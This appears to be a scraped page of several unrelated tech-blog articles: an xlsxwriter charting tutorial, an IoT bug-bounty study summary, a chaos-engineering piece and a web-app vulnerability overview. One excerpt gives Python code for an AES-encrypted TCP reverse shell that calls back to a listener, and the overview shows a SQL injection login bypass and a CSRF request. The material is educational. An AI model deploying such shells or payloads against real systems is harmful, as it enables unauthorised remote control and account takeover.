005     ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
006     ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
007     ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]
```

Lines 10 through 14 are identical to the previous iteration of the function. Representing our table on the spreadsheet is accomplished on line 16.

```
010 def writeXLSX(data):
011     workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
012     main_sheet = workbook.add_worksheet('MySheet')
013
014     date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
```
Data structures not in the specified format require a combination of both methods demonstrated in our previous iterations to achieve the same effect. For example, we can define a table to span across a certain number of rows and columns and then use the write() function for those cells. However, to prevent unnecessary headaches we recommend keeping data in nested lists. Creating charts with Python Lastly, let's create a chart with xlsxwriter. The module supports a variety of different chart types including: line, scatter, bar, column, pie, and area. We use charts to summarize the data in meaningful ways. This is particularly useful when working with large data sets, allowing examiners to gain a high level of understanding of the data before getting into the weeds. Let's modify the previous iteration yet again to display a chart. We will save this modified file as simplexlsx.v3.py. On line 21, we are going to create a variable called department_grades. This variable will be our chart object created by the add_chart()method. For this method, we pass in a dictionary specifying keys and values[SS4] . In this case, we specify the type of the chart to be a column chart. 021 department_grades = workbook.add_chart({'type':'column'}) On line 22, we use theset_title() function and again pass it in a dictionary of parameters. We set the name key equal to our desired title. At this point, we need to tell the chart what data to plot. We do this with the add_series() function. Each category key maps to the Excel notation specifying the horizontal axis data. The vertical axis is represented by the values key. With the data to plot specified, we use theinsert_chart() function to plot the data in the spreadsheet. We give this function a string of the cell to plot the top-left of the chart and then the chart object itself. 
```
022     department_grades.set_title({'name': 'Department and Grade distribution'})
023     department_grades.add_series({'categories': '=MySheet!$A$2:$A$5', 'values': '=MySheet!$C$2:$C$5'})
024     main_sheet.insert_chart('A8', department_grades)
025     workbook.close()
```

Running this version of the script will convert our data into a table and generate a column chart comparing departments by their grades. We can clearly see that, unsurprisingly, the Forensic Science department has the highest GPA earners in the school's program. This information is easy enough to eyeball for such a small data set. However, when working with data of larger magnitude, creating summarizing graphics can be particularly useful for understanding the big picture. Be aware that there is a great deal of additional functionality in the xlsxwriter module that we will not use in our script. This is an extremely powerful module and we recommend it for any operation that requires writing Excel spreadsheets.

Summary

In this article, we began by introducing the Registry module and how it is used to obtain keys and values from registry hives. Next, we dealt with various aspects of spreadsheets, such as cells, tables, and charts, using the xlsxwriter module.

Resources for Article:

Further resources on this subject:

- Test all the things with Python
- An Introduction to Python Lists and Dictionaries
- Python Data Science Up and Running
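As a closing aside, the Registry section above recommended the struct module for decoding binary registry data. A minimal sketch of that idea is shown below; the byte strings are invented for illustration (real values would come from a value's raw_data() call), but the struct and datetime behavior is standard library.

```python
import struct
from datetime import datetime, timedelta

# A REG_DWORD arrives as 4 little-endian bytes; struct.unpack() turns the
# raw bytes into a Python integer.
raw_dword = b'\x0a\x00\x00\x00'
value = struct.unpack('<I', raw_dword)[0]
print(value)  # 10

# Windows FILETIME values (common in registry data) are 64-bit counts of
# 100-nanosecond intervals since 1601-01-01; unpack, then convert.
raw_filetime = struct.pack('<Q', 116444736000000000)  # FILETIME of the Unix epoch
ticks = struct.unpack('<Q', raw_filetime)[0]
timestamp = datetime(1601, 1, 1) + timedelta(microseconds=ticks // 10)
print(timestamp)  # 1970-01-01 00:00:00
```

The format string's leading `<` forces little-endian interpretation, which is what registry hives store regardless of the analysis machine's byte order.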
Savia Lobo
30 Sep 2019
6 min read
Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT

On September 26, a few researchers from the Delft University of Technology (TU Delft) in the Netherlands released a research paper highlighting the importance of crowdsourced ethical hacking approaches for enhancing IoT vulnerability management. They focused on Bug Bounty Programs (BBP) and Responsible Disclosure (RD), which stimulate hackers to report vulnerabilities in exchange for monetary rewards. Supported by a literature survey and expert interviews, the researchers investigated how BBP and RD can facilitate the practice of identifying, classifying, prioritizing, remediating, and mitigating IoT vulnerabilities in an effective and cost-efficient manner. They also make recommendations on how BBP and RD can be integrated with existing security practices to further boost IoT security. The researchers first identified the causes of the lack of security practices in IoT from socio-technical and commercial perspectives. By identifying the hidden pitfalls and blind spots, stakeholders can avoid repeating the same mistakes. They have also derived a set of recommendations as best practices that can benefit IoT vendors, developers, and regulators. The researchers add in their paper, "We note that this study does not intend to cover all the potential vulnerabilities in IoT nor to provide an absolute solution to cure the IoT security puzzle. Instead, our focus is to provide practical and tangible recommendations and potentially new options for stakeholders to tackle IoT-oriented vulnerabilities in consumer goods, which will help enhance the overall IoT security practices."

Challenges in IoT Security

The researchers have highlighted six major reasons from the system and device perspective:

- IoT systems do not have well-defined perimeters, as they can continuously change.
- IoT systems are highly heterogeneous with respect to communication medium and protocols.
- IoT systems often include devices that are not designed to be connected to the Internet or to be secure.
- IoT devices can often autonomously control other IoT devices without human supervision.
- IoT devices could be physically unprotected and/or controlled by different parties.
- The large number of devices increases the security complexity.

Other practical challenges for IoT include the fact that enterprises targeting end users do not have security as a priority and are generally driven by time-to-market rather than by security requirements. Several IoT products are the results of an increasing number of startup companies that have entered this market recently. The vast majority of these startups have fewer than 10 employees, and their obvious priority is to develop functional rather than secure products. In this scenario, investing in security can be perceived as a costly and time-consuming obstacle. In addition, consumer demand for security is low, and consumers tend to prefer cheaper rather than secure products. As a result, companies lack explicit incentives to invest in security.

Crowdsourced security methods: An alternative in Ethical Hacking

"Government agencies and business organizations today are in constant need of ethical hackers to combat the growing threat to IT security. A lot of government agencies, professionals and corporations now understand that if you want to protect a system, you cannot do it by just locking your doors," the researchers observe.

The benefits of ethical hacking include:

- Preventing data from being stolen and misused by malicious attackers.
- Discovering vulnerabilities from an attacker's point of view so as to fix weak points.
- Implementing a secure network that prevents security breaches.
- Protecting networks with real-world assessments.
- Gaining trust from customers and investors by ensuring security.
- Defending national security by protecting data from terrorism.
Bug bounty benefits and Responsible Disclosure

Crowdsourced security methods are an alternative to pen testing in ethical hacking. These methods involve the participation of large numbers of ethical hackers reporting vulnerabilities to companies in exchange for rewards that can consist of money or just recognition. Similar practices have been utilized at large scale in the software industry, for example the Vulnerability Rewards Programs (VRP) applied to Chrome and Firefox, yielding several lessons on software security development. As per the results, the Chrome VRP has cost approximately $580,000 over 3 years and has resulted in 501 bounties paid for the identification of security vulnerabilities. Crowdsourced methods involve thousands of hackers working on a security target. Specifically, instead of a point-in-time test, crowdsourcing enables continuous testing. In addition, compared with pen testing, crowdsourced hackers are only paid when a valid vulnerability is reported. Let us understand Bug Bounty Programs (BBP) and Responsible Disclosure (RD) in detail.

How do Bug Bounty Programs (BBP) work?

Also known as bug bounties, BBPs represent reward-driven crowdsourced security testing where ethical hackers who successfully discover and report vulnerabilities to companies are rewarded. BBPs can further be classified into public and private programs. Public programs allow entire communities of ethical hackers to participate. They typically consist of large-scale bug bounty programs and can be both time-limited and open-ended. Private programs, on the other hand, are generally limited to a selected subgroup of hackers, scoped to specific targets, and limited in time. These programs usually take place through commercial bug bounty platforms, where hackers are selected based on reputation, skills, and experience. The main platform vendors offering BBPs are HackerOne, BugCrowd, Cobalt Labs, and Synack.
These platforms have facilitated establishing and maintaining BBPs for organizations.

What is Responsible Disclosure (RD)?

Also known as coordinated vulnerability disclosure, RD consists of rules and guidelines from companies that allow individuals to report vulnerabilities to organizations. RD policies define the models for a controlled and responsible disclosure of information on vulnerabilities discovered by users. Most software vulnerabilities are discovered by both benign users and ethical hackers. In many situations, individuals might feel responsible for reporting a vulnerability to the organization, but companies may lack a channel through which to report it. Hence, three different outcomes might occur: failed disclosure, full disclosure, and organization capture. Among these three, the target of RD is organization capture, where companies create a safe channel and provide rules for submitting vulnerabilities to their security team, and further allocate resources to follow up the process. One limitation of this qualitative study is that only experts who were conveniently available participated in the interviews. As the participating experts were predominantly from the Netherlands (13 experts), and more generally all from Europe, the results should be generalized with caution to other countries and the security industry as a whole. For IoT vulnerability management, the researchers recommend launching a BBP only after companies have performed initial security testing and fixed the problems. The objective of BBP and RD policies should always be to provide additional support in finding undetected vulnerabilities, and never to be the only security practice. To know more about this study in detail, read the original research paper.

- How Blockchain can level up IoT Security
- How has ethical hacking benefited the software industry
- MITRE's 2019 CWE Top 25 most dangerous software errors list released
Savia Lobo
15 Jun 2018
7 min read
Protect your TCP tunnel by implementing AES encryption with Python [Tutorial]

TCP (Transmission Control Protocol) provides reliable, ordered delivery of data between hosts. TCP works with the Internet Protocol (IP), which defines how computers send packets of data to each other. Thus, it becomes highly important to secure this data to avoid MITM (man-in-the-middle) attacks. In this article, you will learn how to protect your TCP tunnel using Advanced Encryption Standard (AES) encryption to protect its traffic in the transit path. This article is an excerpt taken from 'Python For Offensive PenTest', written by Hussam Khrais.

Protecting your tunnel with AES

In this section, we will protect our TCP tunnel with AES encryption. Generally speaking, AES encryption can operate in two modes: the Counter (CTR) mode encryption (also called the Stream Mode) and the Cipher Block Chaining (CBC) mode encryption (also called the Block Mode).

Cipher Block Chaining (CBC) mode encryption

The Block Mode means that we need to send data in the form of chunks. For instance, if we say that we have a block size of 512 bytes and we want to send 500 bytes, then we need to add 12 bytes of additional padding to reach 512 bytes in total. If we want to send 514 bytes, then the first 512 bytes will be sent in one chunk, and the next chunk will have a size of 2 bytes. However, we cannot just send 2 bytes alone; we need to add additional padding of 510 bytes to reach 512 in total for the second chunk. On the receiver side, you would need to reverse the steps by removing the padding and decrypting the message.

Counter (CTR) mode encryption

Now, let's jump to the other mode, which is the Counter (CTR) mode encryption, or the Stream Mode. Here, the message size does not matter, since we are not limited by a block size and we will encrypt in stream mode, just like XOR does. Now, the block mode is considered stronger by design than the stream mode.
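The chunk arithmetic described above can be sketched in a few lines. This is a toy calculation using the article's 512-byte block figure (the helper name is ours, not from the book), not actual cipher code:

```python
def chunk_plan(message_len, block_size=512):
    """Return (full_blocks, last_chunk_len, padding_needed) for block-mode sending."""
    full_blocks, remainder = divmod(message_len, block_size)
    if remainder == 0:
        return full_blocks, 0, 0  # message already block-aligned, no padding
    # The final partial chunk must be padded up to a full block
    return full_blocks, remainder, block_size - remainder

print(chunk_plan(500))  # 0 full blocks, a 500-byte chunk, 12 bytes of padding
print(chunk_plan(514))  # 1 full block, a 2-byte chunk, 510 bytes of padding
```

This reproduces both of the article's examples: 500 bytes needs 12 bytes of padding, and 514 bytes leaves a 2-byte tail that must be padded with 510 bytes.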
In this section, we will implement the stream mode, and I will leave it to you to research and implement the block mode. The most well-known library for cryptography in Python is called PyCrypto. For Windows, there is a compiled binary for it, and for the Kali side, you just need to run the setup file after downloading the library. You can download the library from http://www.voidspace.org.uk/python/modules.shtml#pycrypto. So, as a start, we will use AES without TCP or HTTP tunneling:

# Python For Offensive PenTest

# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto

# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto

# For Kali, after extracting the tar file, invoke "python setup.py install"

# AES Stream

import os
from Crypto.Cipher import AES

counter = os.urandom(16)  # CTR counter string value with a length of 16 bytes
key = os.urandom(32)      # AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long

# Instantiate a crypto object called enc
enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
encrypted = enc.encrypt("Hussam"*5)
print encrypted

# And a crypto object for decryption
dec = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
decrypted = dec.decrypt(encrypted)
print decrypted

The code is quite straightforward. We start by importing the os library and the AES class from the Crypto.Cipher library. We then use the os library to create the random key and the random counter. The counter length is 16 bytes, and we go for a 32-byte key size in order to implement AES-256. Next, we create an encryption object by passing the key, the AES mode (which is again the stream or CTR mode), and the counter value. Note that the counter is required to be passed as a callable object; that's why we used the lambda construct, a sort of anonymous function that is not bound to a name.
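To see why stream mode frees us from any block-size restriction, here is a toy Python 3 counter-mode construction. It is not AES and not secure; it simply uses SHA-256 as a keystream generator to show the XOR-style encryption described above, where encrypting and decrypting are the same operation:

```python
import hashlib

def keystream(key, counter, length):
    """Produce `length` keystream bytes by hashing key || counter, counter+1, ..."""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + (counter + block).to_bytes(16, "big")).digest()
        block += 1
    return out[:length]

def ctr_xor(key, counter, data):
    """In counter mode, encryption and decryption are the same XOR operation."""
    ks = keystream(key, counter, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))

key, counter = b"H" * 32, 7
ciphertext = ctr_xor(key, counter, b"any length works in stream mode")
assert ctr_xor(key, counter, ciphertext) == b"any length works in stream mode"
```

Because the keystream is generated independently of the data, a 5-byte and a 5000-byte message are handled identically, with no padding at all.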
The decryption is quite similar to the encryption process: we create a decryption object, pass it the encrypted message, and finally print out the decrypted message, which should again be clear text. So, let's quickly test this script and encrypt my name. Once we run the script, the encrypted version is printed first, and below it the decrypted one, which is again the clear text:

>>>
]ox:|s
Hussam
>>>

To test the message size, I will multiply my name by 5, so we have 5 times the length here. The size of the clear-text message does not matter: no matter what the clear-text message is, stream mode handles it with no problem at all. Now, let us integrate our encryption functions into our TCP reverse shell. The following is the client-side script:

# Python For Offensive PenTest

# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto

# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto

# For Kali, after extracting the tar file, invoke "python setup.py install"

# AES - Client - TCP Reverse Shell

import socket
import subprocess
from Crypto.Cipher import AES

counter = "H"*16
key = "H"*32

def encrypt(message):
    encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    return encrypto.encrypt(message)

def decrypt(message):
    decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    return decrypto.decrypt(message)

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.10.100', 8080))

    while True:
        command = decrypt(s.recv(1024))
        print ' We received: ' + command
        ...

What I have added is a new function for encryption and decryption on each side and, as you can see, the key and the counter values are hardcoded on both sides.
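One property of stream mode worth keeping in mind: because the key and counter above are hardcoded, every message is encrypted with the same keystream, and an eavesdropper who captures two ciphertexts can XOR them together to cancel the keystream out. A toy Python 3 illustration of the effect, with plain XOR standing in for AES-CTR:

```python
def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

keystream = bytes(range(16))          # stand-in for a repeated AES-CTR keystream
m1 = b"ipconfig".ljust(16, b" ")
m2 = b"whoami".ljust(16, b" ")

c1 = xor_bytes(m1, keystream)
c2 = xor_bytes(m2, keystream)

# XORing the two captured ciphertexts yields m1 XOR m2: the keystream cancels,
# and the attacker never needed the key or the counter.
assert xor_bytes(c1, c2) == xor_bytes(m1, m2)
```

This is one reason why negotiating fresh random values per session, as the hybrid encryption mentioned later does, matters in practice.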
A side note I need to mention: we will see later, in the hybrid encryption, how we can generate a random value on the Kali machine and transfer it securely to our target; for now, let's keep it hardcoded here. The following is the server-side script:

# Python For Offensive PenTest

# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto

# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto

# For Kali, after extracting the tar file, invoke "python setup.py install"

# AES - Server - TCP Reverse Shell

import socket
from Crypto.Cipher import AES

counter = "H"*16
key = "H"*32

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("10.10.10.100", 8080))
    s.listen(1)
    print '[+] Listening for incoming TCP connection on port 8080'
    conn, addr = s.accept()
    print '[+] We got a connection from: ', addr
    ...

This is how it works: before sending anything, we pass whatever we want to send to the encryption function first. When we get the shell prompt, our input is passed to the encryption function and then sent out of the TCP socket. On the target side, it is almost a mirror image: when we get an encrypted message, we pass it to the decryption function, which returns the clear-text value. Likewise, before sending anything back to the Kali machine, we encrypt it first, just as we did on the Kali side. Now, run the script on both sides, keeping Wireshark running in the background on the Kali side, and start with ipconfig. On the target side, we are able to decrypt the encrypted message back to clear text successfully. To verify that the traffic is encrypted in the transit path, right-click on the particular IP in Wireshark and select Follow TCP Stream; you will see that the message was encrypted before being sent out of the TCP socket.
To summarize, we learned how to safeguard the information passing through our TCP tunnel using the AES encryption algorithm. If you've enjoyed reading this tutorial, do check out Python For Offensive PenTest to learn how to protect the TCP tunnel using RSA.

IoT Forensics: Security in an always connected world where things talk
Top 5 penetration testing tools for ethical hackers
Top 5 cloud security threats to look out for in 2018
How Chaos Engineering can help predict and prevent cyber-attacks preemptively

Sugandha Lahoti
02 Oct 2019
7 min read
It's no surprise that cybersecurity has become a major priority for global businesses of all sizes, often employing a dedicated IT team to focus on thwarting attacks. Huge budgets are spent on acquiring and integrating security solutions, but one of the most effective tools might be hiding in plain sight. Encouraging your own engineers and developers to purposely break systems through a process known as chaos engineering can drive a huge return on investment by identifying unknown weaknesses in your digital architecture. As modern networks become more complex with a vastly larger threat surface, stopping break-ins before they happen takes on even greater importance.

Evolution of Cyberattacks

Hackers typically have a background in software engineering and actually run their criminal enterprises in cycles that are similar to what happens in the development world. That means these criminals focus on iterations and agile changes to keep themselves one step ahead of security tools. Most hackers are focused on financial gains and look to steal data from enterprise or government systems for the purpose of selling it on the Dark Web. However, there is a demographic of cybercriminals focused on simply causing the most damage to certain organizations that they have targeted. In both scenarios, the hacker will first need to find a way to enter the perimeter of the network, either physically or digitally. Many cybercrimes now start with what's known as social engineering, where a hacker convinces an internal employee to divulge information that allows unauthorized access to take place.

Principles of Chaos Engineering

So how can you predict cyberattacks and stop hackers before they infiltrate your systems? That's where chaos engineering can help. The term first gained popularity a decade ago when Netflix created a tool called Chaos Monkey that would randomly take a node of their network offline to force teams to react accordingly.
This proved effective because Netflix learned how to better keep their streaming service online and reduce dependencies between cloud servers. The Chaos Monkey tool can be seen as an example of a much broader practice: chaos engineering. The central insight of this form of testing is that, regardless of how all-encompassing your test suite is, as soon as your code is running on enough machines, errors are going to occur. In large, complex systems, it is essentially impossible to predict where these points of failure will occur. Rather than viewing this as a problem, chaos engineering sees it as an opportunity: since failure is unavoidable, why not deliberately introduce it, and then attempt to solve the randomly generated errors, in order to ensure your systems and processes can deal with failure?

For example, Netflix runs on AWS but, in response to frequent regional failures, has changed its systems to become region agnostic. Netflix has tested that this works using chaos engineering: a "chaos monkey" randomly selects servers to take down, regularly disabling important services in separate regions and challenging engineers to work around these failures. Though Netflix popularized the concept, chaos engineering and testing are now used by many other companies, including Microsoft. The rise of cloud computing has meant that a high proportion of the systems running today have a level of complexity similar to Netflix's server architecture. The cloud computing model has added a high level of complexity to online systems, and the practice of chaos engineering will help to manage that over time, especially when it comes to cybersecurity. It's impossible to predict how and when a hacker will execute an attack, but chaos tests can help you be more proactive in patching your internal vulnerabilities. At first, your developers may be reluctant to jump into chaos activities, since they will think their normal process works.
However, there's a good chance that, over time, they will grow to love chaos testing. You might have to do some convincing in the beginning, though, because this new approach likely goes against everything they've been taught about securing a network.

Designing a Chaos Test

Chaos tests need to be run in a controlled manner in order to be effective, and in many ways the process lines up with the scientific method: in order to run a successful chaos test, you first need to identify a well-formed and refutable hypothesis. A test can then be designed that will prove (or, more likely, falsify) your hypothesis. For example, you might want to know how your network will react if one DNS server drops offline during a distributed denial of service (DDoS) attack by a hacker. This tactic of masking one's IP address and overloading a website's server can be executed through a VPN. Your hypothesis, in this case, is that you will be able to re-route traffic around the affected server. From there, you can begin designing and scheduling the experiment.

If you are new to chaos engineering, you will want to restrict the test to a testing or staging environment to minimize the impact on live systems. Then make sure you have one person responsible for documenting the outcomes as the experiment begins. If you identify an issue during the first run of the chaos test, you can pause that effort and focus on coming up with a solution plan. If not, expand the radius of the experiment until it produces worthwhile results. Running through this type of fire drill can be positive for various groups within a software organization, as it will provide practice for real incidents.

How Chaos Engineering Fits Into Quality Assurance

A lot of companies hear about chaos engineering and jump into it full-speed. But then, over time, they lose their enthusiasm for the practice or get distracted with other projects.
So how should chaos tests be run, and how do you ensure that they remain consistent and valuable? First, define the role of chaos engineering within your larger quality assurance efforts. In fact, your QA team may want to be the leaders of all chaos tests that are run. One important clarification is to distinguish between penetration tests and chaos tests. Both have the same goal of proactively finding system issues, but a penetration test is a specific event with a finite focus, while chaos testing must be more open-ended. When teaching your teams about chaos engineering, it's vital to frame it as a practice and not a one-time activity. Return on investment will be hard to find if you do not systematically follow up after chaos tests are run. The aim should be continuous improvement, to ensure your systems are prepared for any type of cyberattack.

Final Thoughts

These days, security vendors offer a wide range of tools designed to help companies protect their people, data, and infrastructure. Solutions like firewalls and virus scanners are certainly deployed to great success as part of most cybersecurity strategies, but they should never be treated as foolproof. Hackers are notorious for finding ways to get past these types of tools and exploiting companies who are not prepared at a deeper level. The most mature organizations go one step further and find ways to proactively locate their own weaknesses before an outsider can expose them. Chaos engineering is a great way to accomplish this, as it encourages developers to look for gaps and bugs that they might not stumble upon normally. No matter how much planning goes into a system's architecture, unforeseen issues still come up, and hackers are a very dangerous variable in that equation.

Author Bio

Sam Bocetta is a freelance journalist specializing in U.S. diplomacy and national security, with emphasis on technology trends in cyberwarfare, cyberdefense, and cryptography.

Why secure web-based applications with Kali Linux?

Guest Contributor
12 Dec 2019
12 min read
The security of web-based applications is of critical importance. The strength of an application is about more than the collection of features it provides; it includes essential (yet often overlooked) elements such as security. Kali Linux is a trusted, critical component of a security professional's toolkit for securing web applications. The official documentation says it "is specifically geared to meet the requirements of professional penetration testing and security auditing." Incidences of security breaches in web-based applications can be largely contained through the deployment of Kali Linux's suite of up-to-date software.

Build secure systems with Kali Linux

If you wish to employ advanced pentesting techniques with Kali Linux to build highly secured systems, you should check out our recent book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs. This book will help you discover concepts such as social engineering, attacking wireless networks, web services, and embedded devices.

What it means to secure web-based applications

There is a branch of information security dealing with the security of websites and web services (such as APIs); this same area deals with securing web-based applications. For web-based businesses, web application security is a central component. The Internet serves a global population and is used in almost every walk of life one may imagine. As such, web properties can be attacked from various locations and with variable levels of complexity and scale. It is therefore critical to have protection against a variety of security threats that take advantage of vulnerabilities in an application's code. Common web-based application targets are SaaS (Software-as-a-Service) applications and content management systems like WordPress.
A web-based application is a high-priority target if:

- the source code is complex enough to increase the possibility of vulnerabilities that are not contained and result in malicious code manipulation,
- the source code contains exploitable bugs, especially where code is not tested extensively,
- it can provide rewards of high value, including sensitive private data, after successful manipulation of source code,
- attacking it is easy to execute, since most attacks are easy to automate and launch against multiple targets.

Failing to secure its web-based application opens an organization up to attacks. Common consequences include information theft, damaged client relationships, legal proceedings, and revoked licenses.

Common Web App Security Vulnerabilities

A wide variety of attacks are available in the wild for web-based applications. These include targeted database manipulation and large-scale network disruption. Following are a few vectors or methods of attack used by attackers:

Data breaches

A data breach differs from specific attack vectors. A data breach generally refers to the release of private or confidential information. It can stem from mistakes or from malicious action. Data breaches cover a broad scope and could consist of anything from several highly valuable records to millions of exposed user accounts. Common examples of data breaches include Cambridge Analytica and Ashley Madison.

Cross-site scripting (XSS)

This is a vulnerability that gives an attacker a way to inject client-side scripts into a webpage. The attacker can also directly access relevant information, impersonate a user, or trick them into divulging valuable information. A perpetrator could notice a vulnerability in an e-commerce site that permits embedding of HTML tags in the site's comments section. The embedded tags feature permanently on the page, causing the browser to parse them along with other source code each time the page is accessed.
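For the comments-section scenario above, the standard defence is to escape user-supplied markup before rendering it, so the browser treats it as text rather than code. A minimal Python 3 sketch using only the standard library (the comment string is a made-up example):

```python
import html

comment = '<script>alert("stolen cookie")</script>Nice shoes!'

# Rendered raw, this comment would execute in every visitor's browser.
# Escaping converts the markup characters into inert HTML entities.
safe = html.escape(comment)
print(safe)
# &lt;script&gt;alert(&quot;stolen cookie&quot;)&lt;/script&gt;Nice shoes!
```

Escaping at output time, combined with validating input at submission time, is what keeps the embedded tags from ever being parsed as live HTML.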
SQL injection (SQLi)

This is a method whereby a web security vulnerability allows an attacker to interfere with the queries that an application makes to its database. With this, an attacker can view data that they could normally not retrieve. Attackers may also modify or create fresh user permissions, or manipulate or remove sensitive data. Such data could belong to other users, or be any data the application itself can access. In certain cases, an attacker can escalate the attack to exploit backend infrastructure such as the underlying server. Common SQL injection examples include:

- Retrieving hidden data, by modifying a SQL query to return additional results;
- Subverting application logic, by essentially changing a query;
- UNION attacks, so as to retrieve data from different database tables;
- Examining the database, to retrieve information on the database's version and structure; and
- Blind SQL injection, where you're unable to retrieve application responses from queries you control.

To illustrate subverting application logic, take an application that lets users log in with a username and password. If the user submits their username as donnie and their password as peddie, the application tests the credentials by performing this SQL query:

SELECT * FROM users WHERE username = 'donnie' AND password = 'peddie'

The login is successful where the query returns the user's details; it is rejected otherwise. An attacker can log in as a regular user without a password by merely using the SQL comment sequence -- to eliminate the password check from the WHERE clause of the query. An example is submitting the username admin'-- along with a blank password, which produces this query:

SELECT * FROM users WHERE username = 'admin'--' AND password = ''

This query returns the user whose username is admin, successfully logging the attacker in as that user.

Memory corruption

Memory corruption occurs when a memory location is modified, leading to unexpected behavior in the software.
It is often not deliberate, but bad actors work hard to find and exploit memory corruption using code injection or buffer overflow attacks. Hackers love memory vulnerabilities because they enable them to completely control a victim's machine. Continuing the password example, consider a simple password-validation C program that performs no validation on the length of the user input and does not ensure that sufficient memory is available to store the data coming from the user.

Buffer overflow

A buffer is a defined temporary storage area in memory. When software writes data to a buffer, a buffer overflow might occur: overflowing the buffer's capacity leads to overwriting adjacent memory locations with data. Attackers can exploit this to introduce malicious code into memory, with the possibility of developing a vulnerability within the target. In buffer overflow attacks, the extra data sometimes contains specific instructions for actions within the plan of a malicious user; an example is data that triggers a response that changes data, reveals private information, or damages files. Heap-based buffer overflows are more difficult to execute than stack-based overflows. They are also less common, attacking an application by flooding the memory space dedicated to a program. Stack-based buffer overflows exploit applications by using a stack, a memory space for storing input.

Cross-site request forgery (CSRF)

Cross-site request forgery tricks a victim into supplying their authentication or authorization details in requests. The attacker then has the user's account details and proceeds to send requests while pretending to be the user. Armed with a legitimate user account, the attacker can modify, exfiltrate, or destroy critical information. Vital accounts belonging to executives or administrators are typical targets. The attacker commonly induces the victim user to perform an action unintentionally.
Changing the email address on their account, changing their password, or making a funds transfer are examples of such actions. The nature of the action could give the attacker full control over the user's account. The attacker may even gain full control of the application's data and functionality if the target user has high privileges within the application. Three vital conditions for a CSRF attack are:

- A relevant action within the application that the attacker has reason to induce, such as modifying permissions for other users (a privileged action) or acting on user-specific data (changing the user's password, for example).
- Cookie-based session handling to identify who has made user requests, with no other mechanism in place to track sessions or validate user requests.
- No unpredictable request parameters. When causing a user to change their password, for example, the function is not vulnerable if an attacker needs to know the value of the existing password.

Let's say an application contains a function that allows users to change the email address on their account. When a user performs this action, they make a request such as the following:

POST /email/change HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=don@normal-user.com

The attacker may then build a web page containing malicious HTML, typically an auto-submitting form that targets this endpoint. When the victim visits the attacker's web page, the following happens:

- The attacker's page triggers an HTTP request to the vulnerable website.
- If the user is logged in to the vulnerable site, their browser automatically includes their session cookie in the request.
- The vulnerable website processes the malicious request as normal and changes the victim user's email address.

Mitigating Vulnerabilities with Kali Linux

Securing web-based user accounts from exploitation includes essential steps, such as using up-to-date encryption.
Tools are available in Kali that can help generate application crashes or scan for various other vulnerabilities. Fuzzers, as these tools are called, are a relatively easy way to generate malformed data and observe how applications handle it. Other measures include demanding proper authentication, continuously patching vulnerabilities, and exercising good software development hygiene. As part of their first line of defence, many companies take a proactive approach, engaging hackers to participate in bug bounty programs. A bug bounty rewards developers for finding critical flaws in software, with monetary rewards as a typical incentive. Open source software like Kali Linux allows anyone to scour an application's code for flaws. White hat hackers can also come on board with the sole assignment of finding internal vulnerabilities that may have been treated lightly. Smart attackers can find loopholes even in stable security environments, making a fool-proof security strategy a necessity. Securing web-based applications also means protecting against Application Layer, DDoS, and DNS attacks.

Kali Linux is a comprehensive tool for securing web-based applications

Organizations curious about the state of security of their web-based application need not fear, even when they are not prepared for a full-scale penetration test. Attackers are always on the prowl, scanning thousands of web-based applications for the low-hanging fruit. By ensuring a web-based application is resilient in the face of these broad attacks, organizations reduce their chances of experiencing an attack; the hackers will simply migrate to more peaceful grounds. So, how do organizations or individuals stay secure from attackers? Regular pointers include using HTTPS, adding a Web Application Firewall (WAF), installing security plugins, hashing passwords, and ensuring all software is current. These recommendations significantly lower the probability of vulnerabilities being found in application code.
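The fuzzing idea mentioned above can be boiled down to a few lines: generate random malformed inputs, feed them to the target, and record whatever makes it fall over. A toy Python 3 sketch in which the parser is a deliberately fragile stand-in, not a real Kali tool:

```python
import random

def fragile_parser(data):
    """A stand-in target: it was never written to expect a 0xFF byte."""
    if b"\xff" in data:
        raise ValueError("unhandled control byte")
    return len(data)

random.seed(7)  # fixed seed so the toy run is repeatable
crashes = []
for _ in range(1000):
    payload = bytes(random.randrange(256) for _ in range(random.randrange(1, 32)))
    try:
        fragile_parser(payload)
    except Exception:
        crashes.append(payload)  # keep the crashing input for later triage

print("crashing inputs found:", len(crashes))
```

Real fuzzers add input mutation and coverage feedback, but this loop is the core of the technique: the saved crashing inputs become the starting point for triage and patching.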
